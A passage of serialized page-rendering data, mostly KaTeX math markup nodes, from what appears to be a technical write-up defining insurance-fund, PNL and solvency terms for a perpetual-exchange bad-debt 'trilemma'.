,"props":4026,"children":4028},{"className":4027},[2186,2187,2188,2189],[4029],{"type":25,"tag":216,"props":4030,"children":4032},{"className":4031},[246,2151,2189],[4033],{"type":31,"value":2289},{"type":25,"tag":216,"props":4035,"children":4037},{"style":4036},"top:-3.05em;",[4038,4042],{"type":25,"tag":216,"props":4039,"children":4041},{"className":4040,"style":4023},[319],[],{"type":25,"tag":216,"props":4043,"children":4044},{},[4045],{"type":25,"tag":216,"props":4046,"children":4050},{"className":4047},[1841,4048,4049],"op-symbol","large-op",[4051],{"type":31,"value":4052},"∑",{"type":25,"tag":216,"props":4054,"children":4056},{"className":4055},[408],[4057],{"type":31,"value":411},{"type":25,"tag":216,"props":4059,"children":4061},{"className":4060},[304],[4062],{"type":25,"tag":216,"props":4063,"children":4066},{"className":4064,"style":4065},[309],"height:1.2777em;",[4067],{"type":25,"tag":216,"props":4068,"children":4069},{},[],{"type":25,"tag":216,"props":4071,"children":4073},{"className":4072,"style":1871},[257],[],{"type":25,"tag":216,"props":4075,"children":4077},{"className":4076},[246],[4078,4083],{"type":25,"tag":216,"props":4079,"children":4081},{"className":4080},[246,2151],[4082],{"type":31,"value":2541},{"type":25,"tag":216,"props":4084,"children":4086},{"className":4085},[2159],[4087],{"type":25,"tag":216,"props":4088,"children":4090},{"className":4089},[298,299],[4091,4120],{"type":25,"tag":216,"props":4092,"children":4094},{"className":4093},[304],[4095,4115],{"type":25,"tag":216,"props":4096,"children":4098},{"className":4097,"style":2270},[309],[4099],{"type":25,"tag":216,"props":4100,"children":4101},{"style":2274},[4102,4106],{"type":25,"tag":216,"props":4103,"children":4105},{"className":4104,"style":2181},[319],[],{"type":25,"tag":216,"props":4107,"children":4109},{"className":4108},[2186,2187,2188,2189],[4110],{"type":25,"tag":216,"props":4111,"children":4113},{"className":4112},[246,2151,2189],[4114],{"type":31,"value":2289},{"type":25,"tag":216,"props":4116,"children":4118},{"className":4117},[408],[4119],{"type":31,"value":411},{"type":25,"tag":216,"props":4121,"children":4123},{"className":4122},[304],[4124],{"type":25,"tag":216,"props":4125,"children":4127},{"className":4126,"style":2209},[309],[4128],{"type":25,"tag":216,"props":4129,"children":4130},{},[],{"type":25,"tag":216,"props":4132,"children":4133},{"style":2735},[4134,4138],{"type":25,"tag":216,"props":4135,"children":4137},{"className":4136,"style":2138},[319],[],{"type":25,"tag":216,"props":4139,"children":4141},{"className":4140},[246],[4142,4146,4150,4155,4159,4222,4226,4231,4236,4241,4298,4303,4307,4311,4316],{"type":25,"tag":216,"props":4143,"children":4145},{"className":4144},[246],[],{"type":25,"tag":216,"props":4147,"children":4149},{"className":4148,"style":258},[257],[],{"type":25,"tag":216,"props":4151,"children":4153},{"className":4152},[263],[4154],{"type":31,"value":266},{"type":25,"tag":216,"props":4156,"children":4158},{"className":4157,"style":258},[257],[],{"type":25,"tag":216,"props":4160,"children":4162},{"className":4161},[1841,4001],[4163],{"type":25,"tag":216,"props":4164,"children":4166},{"className":4165},[298,299],[4167,4211],{"type":25,"tag":216,"props":4168,"children":4170},{"className":4169},[304],[4171,4206],{"type":25,"tag":216,"props":4172,"children":4174},{"className":4173,"style":4014},[309],[4175,4191],{"type":25,"tag":216,"props":4176,"children":4177},{"style":4018},[4178,4182],{"type":25,"tag":216,"props":4179,"children":4181},{"className":4180,"style":4023},[319],[],{"type":25,"tag":216,"props":4183,"children":4185},{"className":4184},[2186,2187,2188,2189],[4186],{"type":25,"tag":216,"props":4187,"children":4189},{"className":4188},[246,2151,2189],[4190],{"type":31,"value":2289},{"type":25,"tag":216,"props":4192,"children":4193},{"style":4036},[4194,4198],{"type":25,"tag":216,"props":4195,"children":4197},{"className":4196,"style":4023},[319],[],{"type":25,"tag":216,"props":4199,"children":4200},{},[4201],{"type":25,"tag":216,"props":4202,"children":4204},{"className":4203},[1841,4048,4049],[4205],{"type":31,"value":4052},{"type":25,"tag":216,"props":4207,"children":4209},{"className":4208},[408],[4210],{"type":31,"value":411},{"type":25,"tag":216,"props":4212,"children":4214},{"className":4213},[304],[4215],{"type":25,"tag":216,"props":4216,"children":4218},{"className":4217,"style":4065},[309],[4219],{"type":25,"tag":216,"props":4220,"children":4221},{},[],{"type":25,"tag":216,"props":4223,"children":4225},{"className":4224,"style":1871},[257],[],{"type":25,"tag":216,"props":4227,"children":4229},{"className":4228},[1841],[4230],{"type":31,"value":1844},{"type":25,"tag":216,"props":4232,"children":4234},{"className":4233},[287],[4235],{"type":31,"value":1850},{"type":25,"tag":216,"props":4237,"children":4239},{"className":4238},[246],[4240],{"type":31,"value":3378},{"type":25,"tag":216,"props":4242,"children":4244},{"className":4243},[246],[4245,4250],{"type":25,"tag":216,"props":4246,"children":4248},{"className":4247},[246,2151],[4249],{"type":31,"value":2399},{"type":25,"tag":216,"props":4251,"children":4253},{"className":4252},[2159],[4254],{"type":25,"tag":216,"props":4255,"children":4257},{"className":4256},[298,299],[4258,4287],{"type":25,"tag":216,"props":4259,"children":4261},{"className":4260},[304],[4262,4282],{"type":25,"tag":216,"props":4263,"children":4265},{"className":4264,"style":2270},[309],[4266],{"type":25,"tag":216,"props":4267,"children":4268},{"style":2274},[4269,4273],{"type":25,"tag":216,"props":4270,"children":4272},{"className":4271,"style":2181},[319],[],{"type":25,"tag":216,"props":4274,"children":4276},{"className":4275},[2186,2187,2188,2189],[4277],{"type":25,"tag":216,"props":4278,"children":4280},{"className":4279},[246,2151,2189],[4281],{"type":31,"value":2289},{"type":25,"tag":216,"props":4283,"children":4285},{"className":4284},[408],[4286],{"type":31,"value":411},{"type":25,"tag":216,"props":4288,"children":4290},{"className":4289},[304],[4291],{"type":25,"tag":216,"props":4292,"children":4294},{"className":4293,"style":2209},[309],[4295],{"type":25,"tag":216,"props":4296,"children":4297},{},[],{"type":25,"tag":216,"props":4299,"children":4301},{"className":4300},[1864],[4302],{"type":31,"value":1867},{"type":25,"tag":216,"props":4304,"children":4306},{"className":4305,"style":1871},[257],[],{"type":25,"tag":216,"props":4308,"children":4310},{"className":4309,"style":1871},[257],[],{"type":25,"tag":216,"props":4312,"children":4314},{"className":4313},[246],[4315],{"type":31,"value":1882},{"type":25,"tag":216,"props":4317,"children":4319},{"className":4318},[427],[4320],{"type":31,"value":1888},{"type":25,"tag":216,"props":4322,"children":4323},{"style":2807},[4324,4328],{"type":25,"tag":216,"props":4325,"children":4327},{"className":4326,"style":2138},[319],[],{"type":25,"tag":216,"props":4329,"children":4331},{"className":4330},[246],[4332,4336,4340,4345,4349,4412,4416],{"type":25,"tag":216,"props":4333,"children":4335},{"className":4334},[246],[],{"type":25,"tag":216,"props":4337,"children":4339},{"className":4338,"style":258},[257],[],{"type":25,"tag":216,"props":4341,"children":4343},{"className":4342},[263],[4344],{"type":31,"value":266},{"type":25,"tag":216,"props":4346,"children":4348},{"className":4347,"style":258},[257],[],{"type":25,"tag":216,"props":4350,"children":4352},{"className":4351},[1841,4001],[4353],{"type":25,"tag":216,"props":4354,"children":4356},{"className":4355},[298,299],[4357,4401],{"type":25,"tag":216,"props":4358,"children":4360},{"className":4359},[304],[4361,4396],{"type":25,"tag":216,"props":4362,"children":4364},{"className":4363,"style":4014},[309],[4365,4381],{"type":25,"tag":216,"props":4366,"children":4367},{"style":4018},[4368,4372],{"type":25,"tag":216,"props":4369,"children":4371},{"className":4370,"style":4023},[319],[],{"type":25,"tag":216,"props":4373,"children":4375},{"className":4374},[2186,2187,2188,2189],[4376],{"type":25,"tag":216,"props":4377,"children":4379},{"className":4378},[246,2151,2189],[4380],{"type":31,"value":2289},{"type":25,"tag":216,"props":4382,"children":4383},{"style":4036},[4384,4388],{"type":25,"tag":216,"props":4385,"children":4387},{"className":4386,"style":4023},[319],[],{"type":25,"tag":216,"props":4389,"children":4390},{},[4391],{"type":25,"tag":216,"props":4392,"children":4394},{"className":4393},[1841,4048,4049],[4395],{"type":31,"value":4052},{"type":25,"tag":216,"props":4397,"children":4399},{"className":4398},[408],[4400],{"type":31,"value":411},{"type":25,"tag":216,"props":4402,"children":4404},{"className":4403},[304],[4405],{"type":25,"tag":216,"props":4406,"children":4408},{"className":4407,"style":4065},[309],[4409],{"type":25,"tag":216,"props":4410,"children":4411},{},[],{"type":25,"tag":216,"props":4413,"children":4415},{"className":4414,"style":1871},[257],[],{"type":25,"tag":216,"props":4417,"children":4419},{"className":4418},[246],[4420,4425],{"type":25,"tag":216,"props":4421,"children":4423},{"className":4422,"style":2467},[246,2151],[4424],{"type":31,"value":2470},{"type":25,"tag":216,"props":4426,"children":4428},{"className":4427},[2159],[4429],{"type":25,"tag":216,"props":4430,"children":4432},{"className":4431},[298,299],[4433,4462],{"type":25,"tag":216,"props":4434,"children":4436},{"className":4435},[304],[4437,4457],{"type":25,"tag":216,"props":4438,"children":4440},{"className":4439,"style":2270},[309],[4441],{"type":25,"tag":216,"props":4442,"children":4443},{"style":2489},[4444,4448],{"type":25,"tag":216,"props":4445,"children":4447},{"className":4446,"style":2181},[319],[],{"type":25,"tag":216,"props":4449,"children":4451},{"className":4450},[2186,2187,2188,2189],[4452],{"type":25,"tag":216,"props":4453,"children":4455},{"className":4454},[246,2151,2189],[4456],{"type":31,"value":2289},{"type":25,"tag":216,"props":4458,"children":4460},{"className":4459},[408],[4461],{"type":31,"value":411},{"type":25,"tag":216,"props":4463,"children":4465},{"className":4464},[304],[4466],{"type":25,"tag":216,"props":4467,"children":4469},{"className":4468,"style":2209},[309],[4470],{"type":25,"tag":216,"props":4471,"children":4472},{},[],{"type":25,"tag":216,"props":4474,"children":4475},{"style":2879},[4476,4480],{"type":25,"tag":216,"props":4477,"children":4479},{"className":4478,"style":2138},[319],[],{"type":25,"tag":216,"props":4481,"children":4483},{"className":4482},[246],[4484,4488,4492,4497,4501,4506,4511,4568,4572,4577,4581,4586,4590,4595,4599,4656,4661,4665,4669,4674],{"type":25,"tag":216,"props":4485,"children":4487},{"className":4486},[246],[],{"type":25,"tag":216,"props":4489,"children":4491},{"className":4490,"style":258},[257],[],{"type":25,"tag":216,"props":4493,"children":4495},{"className":4494},[263],[4496],{"type":31,"value":266},{"type":25,"tag":216,"props":4498,"children":4500},{"className":4499,"style":258},[257],[],{"type":25,"tag":216,"props":4502,"children":4504},{"className":4503},[1841],[4505],{"type":31,"value":1844},{"type":25,"tag":216,"props":4507,"children":4509},{"className":4508},[287],[4510],{"type":31,"value":1850},{"type":25,"tag":216,"props":4512,"children":4514},{"className":4513},[246],[4515,4520],{"type":25,"tag":216,"props":4516,"children":4518},{"className":4517,"style":2752},[246,2151],[4519],{"type":31,"value":2755},{"type":25,"tag":216,"props":4521,"children":4523},{"className":4522},[2159],[4524],{"type":25,"tag":216,"props":4525,"children":4527},{"className":4526},[298,299],[4528,4557],{"type":25,"tag":216,"props":4529,"children":4531},{"className":4530},[304],[4532,4552],{"type":25,"tag":216,"props":4533,"children":4535},{"className":4534,"style":2698},[309],[4536],{"type":25,"tag":216,"props":4537,"children":4538},{"style":2774},[4539,4543],{"type":25,"tag":216,"props":4540,"children":4542},{"className":4541,"style":2181},[319],[],{"type":25,"tag":216,"props":4544,"children":4546},{"className":4545},[2186,2187,2188,2189],[4547],{"type":25,"tag":216,"props":4548,"children":4550},{"className":4549,"style":2152},[246,2151,2189],[4551],{"type":31,"value":177},{"type":25,"tag":216,"props":4553,"children":4555},{"className":4554},[408],[4556],{"type":31,"value":411},{"type":25,"tag":216,"props":4558,"children":4560},{"className":4559},[304],[4561],{"type":25,"tag":216,"props":4562,"children":4564},{"className":4563,"style":2209},[309],[4565],{"type":25,"tag":216,"props":4566,"children":4567},{},[],{"type":25,"tag":216,"props":4569,"children":4571},{"className":4570,"style":335},[257],[],{"type":25,"tag":216,"props":4573,"children":4575},{"className":4574},[340],[4576],{"type":31,"value":3378},{"type":25,"tag":216,"props":4578,"children":4580},{"className":4579,"style":335},[257],[],{"type":25,"tag":216,"props":4582,"children":4584},{"className":4583,"style":2229},[246,2151],[4585],{"type":31,"value":2232},{"type":25,"tag":216,"props":4587,"children":4589},{"className":4588,"style":335},[257],[],{"type":25,"tag":216,"props":4591,"children":4593},{"className":4592},[340],[4594],{"type":31,"value":3378},{"type":25,"tag":216,"props":4596,"children":4598},{"className":4597,"style":335},[257],[],{"type":25,"tag":216,"props":4600,"children":4602},{"className":4601},[246],[4603,4608],{"type":25,"tag":216,"props":4604,"children":4606},{"className":4605,"style":2679},[246,2151],[4607],{"type":31,"value":2682},{"type":25,"tag":216,"props":4609,"children":4611},{"className":4610},[2159],[4612],{"type":25,"tag":216,"props":4613,"children":4615},{"className":4614},[298,299],[4616,4645],{"type":25,"tag":216,"props":4617,"children":4619},{"className":4618},[304],[4620,4640],{"type":25,"tag":216,"props":4621,"children":4623},{"className":4622,"style":2698},[309],[4624],{"type":25,"tag":216,"props":4625,"children":4626},{"style":2702},[4627,4631],{"type":25,"tag":216,"props":4628,"children":4630},{"className":4629,"style":2181},[319],[],{"type":25,"tag":216,"props":4632,"children":4634},{"className":4633},[2186,2187,2188,2189],[4635],{"type":25,"tag":216,"props":4636,"children":4638},{"className":4637,"style":2152},[246,2151,2189],[4639],{"type":31,"value":177},{"type":25,"tag":216,"props":4641,"children":4643},{"className":4642},[408],[4644],{"type":31,"value":411},{"type":25,"tag":216,"props":4646,"children":4648},{"className":4647},[304],[4649],{"type":25,"tag":216,"props":4650,"children":4652},{"className":4651,"style":2209},[309],[4653],{"type":25,"tag":216,"props":4654,"children":4655},{},[],{"type":25,"tag":216,"props":4657,"children":4659},{"className":4658},[1864],[4660],{"type":31,"value":1867},{"type":25,"tag":216,"props":4662,"children":4664},{"className":4663,"style":1871},[257],[],{"type":25,"tag":216,"props":4666,"children":4668},{"className":4667,"style":1871},[257],[],{"type":25,"tag":216,"props":4670,"children":4672},{"className":4671},[246],[4673],{"type":31,"value":1882},{"type":25,"tag":216,"props":4675,"children":4677},{"className":4676},[427],[4678],{"type":31,"value":1888},{"type":25,"tag":216,"props":4680,"children":4682},{"className":4681},[408],[4683],{"type":31,"value":411},{"type":25,"tag":216,"props":4685,"children":4687},{"className":4686},[304],[4688],{"type":25,"tag":216,"props":4689,"children":4691},{"className":4690,"style":2963},[309],[4692],{"type":25,"tag":216,"props":4693,"children":4694},{},[],{"type":25,"tag":38,"props":4696,"children":4697},{},[4698,4699,4778,4780,4806,4808,4886,4888,4965],{"type":31,"value":1850},{"type":25,"tag":82,"props":4700,"children":4703},{"className":4701},[212,4702],"math-inline",[4704],{"type":25,"tag":216,"props":4705,"children":4707},{"className":4706},[224],[4708],{"type":25,"tag":216,"props":4709,"children":4711},{"className":4710,"ariaHidden":230},[229],[4712],{"type":25,"tag":216,"props":4713,"children":4715},{"className":4714},[235],[4716,4721],{"type":25,"tag":216,"props":4717,"children":4720},{"className":4718,"style":4719},[240],"height:0.8333em;vertical-align:-0.15em;",[],{"type":25,"tag":216,"props":4722,"children":4724},{"className":4723},[246],[4725,4730],{"type":25,"tag":216,"props":4726,"children":4728},{"className":4727,"style":2152},[246,2151],[4729],{"type":31,"value":2155},{"type":25,"tag":216,"props":4731,"children":4733},{"className":4732},[2159],[4734],{"type":25,"tag":216,"props":4735,"children":4737},{"className":4736},[298,299],[4738,4767],{"type":25,"tag":216,"props":4739,"children":4741},{"className":4740},[304],[4742,4762],{"type":25,"tag":216,"props":4743,"children":4745},{"className":4744,"style":2172},[309],[4746],{"type":25,"tag":216,"props":4747,"children":4748},{"style":2176},[4749,4753],{"type":25,"tag":216,"props":4750,"children":4752},{"className":4751,"style":2181},[319],[],{"type":25,"tag":216,"props":4754,"children":4756},{"className":4755},[2186,2187,2188,2189],[4757],{"type":25,"tag":216,"props":4758,"children":4760},{"className":4759},[246,2151,2189],[4761],{"type":31,"value":2196},{"type":25,"tag":216,"props":4763,"children":4765},{"className":4764},[408],[4766],{"type":31,"value":411},{"type":25,"tag":216,"props":4768,"children":4770},{"className":4769},[304],[4771],{"type":25,"tag":216,"props":4772,"children":4774},{"className":4773,"style":2209},[309],[4775],{"type":25,"tag":216,"props":4776,"children":4777},{},[],{"type":31,"value":4779},": mark price from different sources; ",{"type":25,"tag":82,"props":4781,"children":4783},{"className":4782},[212,4702],[4784],{"type":25,"tag":216,"props":4785,"children":4787},{"className":4786},[224],[4788],{"type":25,"tag":216,"props":4789,"children":4791},{"className":4790,"ariaHidden":230},[229],[4792],{"type":25,"tag":216,"props":4793,"children":4795},{"className":4794},[235],[4796,4801],{"type":25,"tag":216,"props":4797,"children":4800},{"className":4798,"style":4799},[240],"height:0.6833em;",[],{"type":25,"tag":216,"props":4802,"children":4804},{"className":4803,"style":2229},[246,2151],[4805],{"type":31,"value":2232},{"type":31,"value":4807},": insurance fund, roughly the 5M on testnet HL; ",{"type":25,"tag":82,"props":4809,"children":4811},{"className":4810},[212,4702],[4812],{"type":25,"tag":216,"props":4813,"children":4815},{"className":4814},[224],[4816],{"type":25,"tag":216,"props":4817,"children":4819},{"className":4818,"ariaHidden":230},[229],[4820],{"type":25,"tag":216,"props":4821,"children":4823},{"className":4822},[235],[4824,4829],{"type":25,"tag":216,"props":4825,"children":4828},{"className":4826,"style":4827},[240],"height:0.5806em;vertical-align:-0.15em;",[],{"type":25,"tag":216,"props":4830,"children":4832},{"className":4831},[246],[4833,4838],{"type":25,"tag":216,"props":4834,"children":4836},{"className":4835,"style":2325},[246,2151],[4837],{"type":31,"value":2328},{"type":25,"tag":216,"props":4839,"children":4841},{"className":4840},[2159],[4842],{"type":25,"tag":216,"props":4843,"children":4845},{"className":4844},[298,299],[4846,4875],{"type":25,"tag":216,"props":4847,"children":4849},{"className":4848},[304],[4850,4870],{"type":25,"tag":216,"props":4851,"children":4853},{"className":4852,"style":2270},[309],[4854],{"type":25,"tag":216,"props":4855,"children":4856},{"style":2347},[4857,4861],{"type":25,"tag":216,"props":4858,"children":4860},{"className":4859,"style":2181},[319],[],{"type":25,"tag":216,"props":4862,"children":4864},{"className":4863},[2186,2187,2188,2189],[4865],{"type":25,"tag":216,"props":4866,"children":4868},{"className":4867},[246,2151,2189],[4869],{"type":31,"value":2289},{"type":25,"tag":216,"props":4871,"children":4873},{"className":4872},[408],[4874],{"type":31,"value":411},{"type":25,"tag":216,"props":4876,"children":4878},{"className":4877},[304],[4879],{"type":25,"tag":216,"props":4880,"children":4882},{"className":4881,"style":2209},[309],[4883],{"type":25,"tag":216,"props":4884,"children":4885},{},[],{"type":31,"value":4887}," is PNL for longs, negated for shorts; ",{"type":25,"tag":82,"props":4889,"children":4891},{"className":4890},[212,4702],[4892],{"type":25,"tag":216,"props":4893,"children":4895},{"className":4894},[224],[4896],{"type":25,"tag":216,"props":4897,"children":4899},{"className":4898,"ariaHidden":230},[229],[4900],{"type":25,"tag":216,"props":4901,"children":4903},{"className":4902},[235],[4904,4908],{"type":25,"tag":216,"props":4905,"children":4907},{"className":4906,"style":4827},[240],[],{"type":25,"tag":216,"props":4909,"children":4911},{"className":4910},[246],[4912,4917],{"type":25,"tag":216,"props":4913,"children":4915},{"className":4914,"style":2467},[246,2151],[4916],{"type":31,"value":2470},{"type":25,"tag":216,"props":4918,"children":4920},{"className":4919},[2159],[4921],{"type":25,"tag":216,"props":4922,"children":4924},{"className":4923},[298,299],[4925,4954],{"type":25,"tag":216,"props":4926,"children":4928},{"className":4927},[304],[4929,4949],{"type":25,"tag":216,"props":4930,"children":4932},{"className":4931,"style":2270},[309],[4933],{"type":25,"tag":216,"props":4934,"children":4935},{"style":2489},[4936,4940],{"type":25,"tag":216,"props":4937,"children":4939},{"className":4938,"style":2181},[319],[],{"type":25,"tag":216,"props":4941,"children":4943},{"className":4942},[2186,2187,2188,2189],[4944],{"type":25,"tag":216,"props":4945,"children":4947},{"className":4946},[246,2151,2189],[4948],{"type":31,"value":2289},{"type":25,"tag":216,"props":4950,"children":4952},{"className":4951},[408],[4953],{"type":31,"value":411},{"type":25,"tag":216,"props":4955,"children":4957},{"className":4956},[304],[4958],{"type":25,"tag":216,"props":4959,"children":4961},{"className":4960,"style":2209},[309],[4962],{"type":25,"tag":216,"props":4963,"children":4964},{},[],{"type":31,"value":4966}," is the positive part of PNL.)",{"type":25,"tag":38,"props":4968,"children":4969},{},[4970],{"type":31,"value":4971},"And let's make the trilemma definitions concrete:",{"type":25,"tag":2039,"props":4973,"children":4974},{},[4975,5460,6030],{"type":25,"tag":2043,"props":4976,"children":4977},{},[4978,4982,4984,5244,5246,5300,5302,5405,5407,5458],{"type":25,"tag":64,"props":4979,"children":4980},{},[4981],{"type":31,"value":2050},{"type":31,"value":4983}," = ",{"type":25,"tag":82,"props":4985,"children":4987},{"className":4986},[212,4702],[4988],{"type":25,"tag":216,"props":4989,"children":4991},{"className":4990},[224],[4992],{"type":25,"tag":216,"props":4993,"children":4995},{"className":4994,"ariaHidden":230},[229],[4996,5023],{"type":25,"tag":216,"props":4997,"children":4999},{"className":4998},[235],[5000,5005,5010,5014,5019],{"type":25,"tag":216,"props":5001,"children":5004},{"className":5002,"style":5003},[240],"height:0.7278em;vertical-align:-0.0833em;",[],{"type":25,"tag":216,"props":5006,"children":5008},{"className":5007},[246],[5009],{"type":31,"value":184},{"type":25,"tag":216,"props":5011,"children":5013},{"className":5012,"style":335},[257],[],{"type":25,"tag":216,"props":5015,"children":5017},{"className":5016},[340],[5018],{"type":31,"value":3378},{"type":25,"tag":216,"props":5020,"children":5022},{"className":5021,"style":335},[257],[],{"type":25,"tag":216,"props":5024,"children":5026},{"className":5025},[235],[5027,5032],{"type":25,"tag":216,"props":5028,"children":5031},{"className":5029,"style":5030},[240],"height:1.3337em;vertical-align:-0.4453em;",[],{"type":25,"tag":216,"props":5033,"children":5035},{"className":5034},[246],[5036,5040,5240],{"type":25,"tag":216,"props":5037,"children":5039},{"className":5038},[287,288],[],{"type":25,"tag":216,"props":5041,"children":5043},{"className":5042},[293],[5044],{"type":25,"tag":216,"props":5045,"children":5047},{"className":5046},[298,299],[5048,5228],{"type":25,"tag":216,"props":5049,"children":5051},{"className":5050},[304],[5052,5223],{"type":25,"tag":216,"props":5053,"children":5056},{"className":5054,"style":5055},[309],"height:0.8884em;",[5057,5136,5147],{"type":25,"tag":216,"props":5058,"children":5060},{"style":5059},"top:-2.655em;",[5061,5065],{"type":25,"tag":216,"props":5062,"children":5064},{"className":5063,"style":320},[319],[],{"type":25,"tag":216,"props":5066,"children":5068},{"className":5067},[2186,2187,2188,2189],[5069],{"type":25,"tag":216,"props":5070,"children":5072},{"className":5071},[246,2189],[5073],{"type":25,"tag":216,"props":5074,"children":5076},{"className":5075},[246,2189],[5077,5082],{"type":25,"tag":216,"props":5078,"children":5080},{"className":5079,"style":2752},[246,2151,2189],[5081],{"type":31,"value":2755},{"type":25,"tag":216,"props":5083,"children":5085},{"className":5084},[2159],[5086],{"type":25,"tag":216,"props":5087,"children":5089},{"className":5088},[298,299],[5090,5124],{"type":25,"tag":216,"props":5091,"children":5093},{"className":5092},[304],[5094,5119],{"type":25,"tag":216,"props":5095,"children":5098},{"className":5096,"style":5097},[309],"height:0.3448em;",[5099],{"type":25,"tag":216,"props":5100,"children":5102},{"style":5101},"top:-2.3567em;margin-left:-0.0278em;margin-right:0.0714em;",[5103,5108],{"type":25,"tag":216,"props":5104,"children":5107},{"className":5105,"style":5106},[319],"height:2.5em;",[],{"type":25,"tag":216,"props":5109,"children":5113},{"className":5110},[2186,5111,5112,2189],"reset-size3","size1",[5114],{"type":25,"tag":216,"props":5115,"children":5117},{"className":5116,"style":2152},[246,2151,2189],[5118],{"type":31,"value":177},{"type":25,"tag":216,"props":5120,"children":5122},{"className":5121},[408],[5123],{"type":31,"value":411},{"type":25,"tag":216,"props":5125,"children":5127},{"className":5126},[304],[5128],{"type":25,"tag":216,"props":5129,"children":5132},{"className":5130,"style":5131},[309],"height:0.1433em;",[5133],{"type":25,"tag":216,"props":5134,"children":5135},{},[],{"type":25,"tag":216,"props":5137,"children":5138},{"style":360},[5139,5143],{"type":25,"tag":216,"props":5140,"children":5142},{"className":5141,"style":320},[319],[],{"type":25,"tag":216,"props":5144,"children":5146},{"className":5145,"style":370},[369],[],{"type":25,"tag":216,"props":5148,"children":5150},{"style":5149},"top:-3.4101em;",[5151,5155],{"type":25,"tag":216,"props":5152,"children":5154},{"className":5153,"style":320},[319],[],{"type":25,"tag":216,"props":5156,"children":5158},{"className":5157},[2186,2187,2188,2189],[5159],{"type":25,"tag":216,"props":5160,"children":5162},{"className":5161},[246,2189],[5163],{"type":25,"tag":216,"props":5164,"children":5166},{"className":5165},[246,2189],[5167,5172],{"type":25,"tag":216,"props":5168,"children":5170},{"className":5169,"style":2896},[246,2151,2189],[5171],{"type":31,"value":2899},{"type":25,"tag":216,"props":5173,"children":5175},{"className":5174},[2159],[5176],{"type":25,"tag":216,"props":5177,"children":5179},{"className":5178},[298,299],[5180,5211],{"type":25,"tag":216,"props":5181,"children":5183},{"className":5182},[304],[5184,5206],{"type":25,"tag":216,"props":5185,"children":5188},{"className":5186,"style":5187},[309],"height:0.2963em;",[5189],{"type":25,"tag":216,"props":5190,"children":5192},{"style":5191},"top:-2.357em;margin-left:-0.0077em;margin-right:0.0714em;",[5193,5197],{"type":25,"tag":216,"props":5194,"children":5196},{"className":5195,"style":5106},[319],[],{"type":25,"tag":216,"props":5198,"children":5200},{"className":5199},[2186,5111,5112,2189],[5201],{"type":25,"tag":216,"props":5202,"children":5204},{"className":5203},[246,2151,2189],[5205],{"type":31,"value":2934},{"type":25,"tag":216,"props":5207,"children":5209},{"className":5208},[408],[5210],{"type":31,"value":411},{"type":25,"tag":216,"props":5212,"children":5214},{"className":5213},[304],[5215],{"type":25,"tag":216,"props":5216,"children":5219},{"className":5217,"style":5218},[309],"height:0.143em;",[5220],{"type":25,"tag":216,"props":5221,"children":5222},{},[],{"type":25,"tag":216,"props":5224,"children":5226},{"className":5225},[408],[5227],{"type":31,"value":411},{"type":25,"tag":216,"props":5229,"children":5231},{"className":5230},[304],[5232],{"type":25,"tag":216,"props":5233,"children":5236},{"className":5234,"style":5235},[309],"height:0.4453em;",[5237],{"type":25,"tag":216,"props":5238,"children":5239},{},[],{"type":25,"tag":216,"props":5241,"children":5243},{"className":5242},[427,288],[],{"type":31,"value":5245}," — how much of the total bad debt was actually covered. ",{"type":25,"tag":82,"props":5247,"children":5249},{"className":5248},[212,4702],[5250],{"type":25,"tag":216,"props":5251,"children":5253},{"className":5252},[224],[5254],{"type":25,"tag":216,"props":5255,"children":5257},{"className":5256,"ariaHidden":230},[229],[5258,5286],{"type":25,"tag":216,"props":5259,"children":5261},{"className":5260},[235],[5262,5266,5273,5277,5282],{"type":25,"tag":216,"props":5263,"children":5265},{"className":5264,"style":4799},[240],[],{"type":25,"tag":216,"props":5267,"children":5270},{"className":5268,"style":5269},[246,2151],"margin-right:0.05764em;",[5271],{"type":31,"value":5272},"S",{"type":25,"tag":216,"props":5274,"children":5276},{"className":5275,"style":258},[257],[],{"type":25,"tag":216,"props":5278,"children":5280},{"className":5279},[263],[5281],{"type":31,"value":266},{"type":25,"tag":216,"props":5283,"children":5285},{"className":5284,"style":258},[257],[],{"type":25,"tag":216,"props":5287,"children":5289},{"className":5288},[235],[5290,5295],{"type":25,"tag":216,"props":5291,"children":5294},{"className":5292,"style":5293},[240],"height:0.6444em;",[],{"type":25,"tag":216,"props":5296,"children":5298},{"className":5297},[246],[5299],{"type":31,"value":184},{"type":31,"value":5301}," means fully solvent (",{"type":25,"tag":82,"props":5303,"children":5305},{"className":5304},[212,4702],[5306],{"type":25,"tag":216,"props":5307,"children":5309},{"className":5308},[224],[5310],{"type":25,"tag":216,"props":5311,"children":5313},{"className":5312,"ariaHidden":230},[229],[5314,5392],{"type":25,"tag":216,"props":5315,"children":5317},{"className":5316},[235],[5318,5322,5379,5383,5388],{"type":25,"tag":216,"props":5319,"children":5321},{"className":5320,"style":4719},[240],[],{"type":25,"tag":216,"props":5323,"children":5325},{"className":5324},[246],[5326,5331],{"type":25,"tag":216,"props":5327,"children":5329},{"className":5328,"style":2896},[246,2151],[5330],{"type":31,"value":2899},{"type":25,"tag":216,"props":5332,"children":5334},{"className":5333},[2159],[5335],{"type":25,"tag":216,"props":5336,"children":5338},{"className":5337},[298,299],[5339,5368],{"type":25,"tag":216,"props":5340,"children":5342},{"className":5341},[304],[5343,5363],{"type":25,"tag":216,"props":5344,"children":5346},{"className":5345,"style":2915},[309],[5347],{"type":25,"tag":216,"props":5348,"children":5349},{"style":2919},[5350,5354],{"type":25,"tag":216,"props":5351,"children":5353},{"className":5352,"style":2181},[319],[],{"type":25,"tag":216,"props":5355,"children":5357},{"className":5356},[2186,2187,2188,2189],[5358],{"type":25,"tag":216,"props":5359,"children":5361},{"className":5360},[246,2151,2189],[5362],{"type":31,"value":2934},{"type":25,"tag":216,"props":5364,"children":5366},{"className":5365},[408],[5367],{"type":31,"value":411},{"type":25,"tag":216,"props":5369,"children":5371},{"className":5370},[304],[5372],{"type":25,"tag":216,"props":5373,"children":5375},{"className":5374,"style":2209},[309],[5376],{"type":25,"tag":216,"props":5377,"children":5378},{},[],{"type":25,"tag":216,"props":5380,"children":5382},{"className":5381,"style":258},[257],[],{"type":25,"tag":216,"props":5384,"children":5386},{"className":5385},[263],[5387],{"type":31,"value":266},{"type":25,"tag":216,"props":5389,"children":5391},{"className":5390,"style":258},[257],[],{"type":25,"tag":216,"props":5393,"children":5395},{"className":5394},[235],[5396,5400],{"type":25,"tag":216,"props":5397,"children":5399},{"className":5398,"style":5293},[240],[],{"type":25,"tag":216,"props":5401,"children":5403},{"className":5402},[246],[5404],{"type":31,"value":1882},{"type":31,"value":5406},"), 